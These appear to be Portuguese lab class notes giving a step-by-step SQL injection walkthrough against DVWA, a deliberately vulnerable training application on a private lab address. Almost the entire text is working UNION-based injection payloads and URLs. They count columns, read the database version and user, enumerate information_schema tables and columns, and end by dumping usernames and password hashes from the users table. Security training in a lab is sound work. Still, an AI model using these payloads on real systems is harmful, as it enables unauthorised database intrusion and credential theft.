// Aula 3 - Passo a passo de SQL Injection

No HackBar, substituímos o valor do parâmetro id por 1' order by 1 -- ' 

http://192.168.0.24/dvwa/vulnerabilities/sqli/?id=1' order by 1 -- ' &Submit=Submit#

http://192.168.0.24/dvwa/vulnerabilities/sqli/?id=1' order by 3 -- ' &Submit=Submit#

1' union select 1,2 -- ' 

http://192.168.0.24/dvwa/vulnerabilities/sqli/?id=1' union select 1,2 -- ' &Submit=Submit#

1' union select @@version,current_user() -- ' 

http://192.168.0.24/dvwa/vulnerabilities/sqli/?id=1' union select @@version,current_user() -- ' &Submit=Submit#

1' union select table_schema, table_name FROM information_schema.tables WHERE table_name LIKE '%user%' -- '

http://192.168.0.24/dvwa/vulnerabilities/sqli/?id=1' union select table_schema, table_name FROM information_schema.tables WHERE table_name LIKE '%user%' -- '&Submit=Submit#

1' union select column_name, 1 FROM information_schema.columns WHERE table_name = 'users' -- '

http://192.168.0.24/dvwa/vulnerabilities/sqli/?id=1' union select column_name, 1 FROM information_schema.columns WHERE table_name = 'users' -- '&Submit=Submit#

1' union select user, password FROM dvwa.users -- '

http://192.168.0.24/dvwa/vulnerabilities/sqli/?id=1' union select user, password FROM dvwa.users -- '&Submit=Submit#

















